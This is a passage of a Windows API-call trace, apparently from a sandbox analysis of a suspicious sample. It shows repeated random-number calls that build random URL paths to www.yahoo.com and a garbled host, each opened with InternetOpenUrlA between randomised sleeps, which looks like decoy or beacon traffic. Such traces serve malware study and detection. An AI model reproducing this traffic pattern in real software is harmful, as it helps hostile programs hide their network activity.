(hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.068] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.068] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.068] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.069] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.069] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.069] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.069] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.069] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.069] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.069] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.069] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.070] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.070] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0199.070] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.070] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.070] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.070] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.070] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.070] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.070] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.071] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.071] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.071] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.071] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.071] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0199.071] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.072] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0199.072] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.072] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0199.072] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.072] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4d4b11, cbBuffer=0x11, dwFlags=0x2 | out: pbBuffer=0x4d4b11) returned 0x0 [0199.072] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.072] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0199.073] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.073] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.073] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.073] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0199.073] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.073] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.073] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.073] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.074] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.074] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.074] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.074] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0199.074] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.074] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.074] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.074] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0199.075] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.075] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.075] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.075] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.075] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.075] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0199.075] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.075] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.076] GetProcessHeap () returned 0x440000 [0199.076] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x472f30 [0199.076] lstrcpyA (in: lpString1=0x472f30, lpString2="B-ÿ³s://www.yahoo.com" | out: lpString1="B-ÿ³s://www.yahoo.com") returned="B-ÿ³s://www.yahoo.com" [0199.076] lstrcatA (in: lpString1="B-ÿ³s://www.yahoo.com", lpString2="/v2tpk6p0lqo2umlxxgyhAsgvLwgc/bWsQjlolF9frut2po7ZOg73b01b5ypb07yn2vb86h5Mrtm/S79p4cjrh6ob26bg7z6geremdj2qnajs81W/49u4kCbl9y5pa1si/" | out: lpString1="B-ÿ³s://www.yahoo.com/v2tpk6p0lqo2umlxxgyhAsgvLwgc/bWsQjlolF9frut2po7ZOg73b01b5ypb07yn2vb86h5Mrtm/S79p4cjrh6ob26bg7z6geremdj2qnajs81W/49u4kCbl9y5pa1si/") returned="B-ÿ³s://www.yahoo.com/v2tpk6p0lqo2umlxxgyhAsgvLwgc/bWsQjlolF9frut2po7ZOg73b01b5ypb07yn2vb86h5Mrtm/S79p4cjrh6ob26bg7z6geremdj2qnajs81W/49u4kCbl9y5pa1si/" [0199.077] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0199.077] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="B-ÿ³s://www.yahoo.com/v2tpk6p0lqo2umlxxgyhAsgvLwgc/bWsQjlolF9frut2po7ZOg73b01b5ypb07yn2vb86h5Mrtm/S79p4cjrh6ob26bg7z6geremdj2qnajs81W/49u4kCbl9y5pa1si/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0199.078] GetProcessHeap () returned 0x440000 [0199.078] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x472f30 | out: hHeap=0x440000) returned 1 [0199.078] GetProcessHeap () returned 0x440000 [0199.078] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4d4aa0 | out: hHeap=0x440000) returned 1 [0199.078] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0199.079] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0199.080] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.080] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0199.080] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0199.080] Sleep (dwMilliseconds=0x198c0) [0199.404] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.405] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0199.405] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.405] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0199.405] GetProcessHeap () returned 0x440000 [0199.405] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x64) returned 0x3a1b250 [0199.405] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.406] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0199.406] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.406] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a1b251, cbBuffer=0x11, dwFlags=0x2 | out: pbBuffer=0x3a1b251) returned 0x0 [0199.406] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.407] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.407] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.407] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.407] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.407] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0199.407] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.408] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.408] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.408] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.408] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.408] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.409] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.409] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.409] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.409] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.409] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.409] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.410] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.410] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.410] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.410] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.410] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.410] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.410] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.410] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0199.411] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.411] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a1b262, cbBuffer=0x2b, dwFlags=0x2 | out: pbBuffer=0x3a1b262) returned 0x0 [0199.411] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.411] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.411] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.411] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.411] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.411] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0199.412] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.412] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.412] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.412] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0199.412] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.412] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0199.412] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.412] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.413] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.413] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.413] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.413] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0199.413] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.413] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0199.413] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.413] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.414] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.414] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.414] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.414] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.414] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.414] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0199.414] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.415] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0199.415] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.415] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.415] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.415] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.415] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.415] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.415] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.416] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.416] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.416] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.416] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.416] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.416] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.416] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.417] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.417] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0199.417] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.417] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0199.417] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.417] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.418] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.418] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.418] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.418] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.418] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.418] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0199.419] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.419] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.419] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.419] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0199.419] GetProcessHeap () returned 0x440000 [0199.419] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x473b90 [0199.419] lstrcpyA (in: lpString1=0x473b90, lpString2="P²¡\x03" | out: lpString1="P²¡\x03") returned="P²¡\x03" [0199.419] lstrcatA (in: lpString1="P²¡\x03", lpString2="/rcg9nuuq3tJmioxp/5Eum0gv82gjSk74fksO1zsRuukrW2aNc13qo2p1vN9/" | out: lpString1="P²¡\x03/rcg9nuuq3tJmioxp/5Eum0gv82gjSk74fksO1zsRuukrW2aNc13qo2p1vN9/") returned="P²¡\x03/rcg9nuuq3tJmioxp/5Eum0gv82gjSk74fksO1zsRuukrW2aNc13qo2p1vN9/" [0199.419] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0199.419] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="P²¡\x03/rcg9nuuq3tJmioxp/5Eum0gv82gjSk74fksO1zsRuukrW2aNc13qo2p1vN9/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0199.420] GetProcessHeap () returned 0x440000 [0199.420] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x473b90 | out: hHeap=0x440000) returned 1 [0199.420] GetProcessHeap () returned 0x440000 [0199.420] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x3a1b250 | out: hHeap=0x440000) returned 1 [0199.420] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0199.420] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0199.420] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.420] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0199.420] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0199.420] Sleep (dwMilliseconds=0x10e89) [0199.650] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.650] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0199.650] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.650] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: 